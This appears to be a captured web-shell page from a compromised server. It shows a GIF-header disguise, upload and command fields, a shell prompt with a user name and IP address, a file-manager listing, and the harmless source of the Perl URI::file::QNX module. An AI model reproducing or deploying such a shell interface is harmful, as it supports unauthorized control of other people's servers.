GIF87a; 404

MY HEART




Upload:

Command:

diavoloapp@3.147.45.232: ~ $
package URI::file::QNX;

use strict;
use warnings;

use parent 'URI::file::Unix';

our $VERSION = '1.76';

sub _file_extract_path
{
    my($class, $path) = @_;
    # tidy path
    $path =~ s,(.)//+,$1/,g; # ^// is correct
    $path =~ s,(/\.)+/,/,g;
    $path = "./$path" if $path =~ m,^[^:/]+:,,; # look like "scheme:"
    $path;
}

1;

Filemanager

Name Type Size Permission Actions
Base.pm File 1.45 KB 0444
FAT.pm File 497 B 0444
Mac.pm File 2.43 KB 0444
OS2.pm File 561 B 0444
QNX.pm File 337 B 0444
Unix.pm File 1022 B 0444
Win32.pm File 1.72 KB 0444